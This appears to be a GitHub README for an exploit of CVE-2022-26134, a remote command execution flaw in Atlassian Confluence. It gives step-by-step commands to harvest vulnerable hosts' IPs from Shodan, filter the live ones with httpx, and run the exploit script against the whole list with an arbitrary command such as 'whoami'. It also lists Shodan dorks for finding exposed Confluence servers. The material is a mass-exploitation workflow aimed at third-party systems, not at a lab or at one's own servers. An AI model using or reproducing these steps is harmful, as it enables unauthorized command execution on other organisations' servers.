CVE-2022-26134

First run the shodan scripts to grabs all the ips

python3 shodan_script.py -API your_api -L limit -D "http.favicon.hash:-305179312 200" > log.txt

ex: python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt
For all valid ips :

cat log.txt | httpx -o forexploits.txt
Run Exploit against the list "forexploits.txt" :

python3 CVE-2022-26134.py forexploits.txt "whoami"

which prints the ip and command for vulnerable hosts.

Shodan_Dorks for CVE-2022-26134

http.component:"atlassian confluence"

http.favicon.hash:-305179312"

http.title:"Log In - Confluence" 200

http.component:"atlassian confluence" http.title:"Log In - Confluence" 200

http.favicon.hash:-305179312 200

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
CVE-2022-26134.py		CVE-2022-26134.py
README.md		README.md
shodan_script.py		shodan_script.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2022-26134

Shodan_Dorks for CVE-2022-26134

About

Releases

Packages

Languages

abhishekmorla/CVE-2022-26134

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-26134

Shodan_Dorks for CVE-2022-26134

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages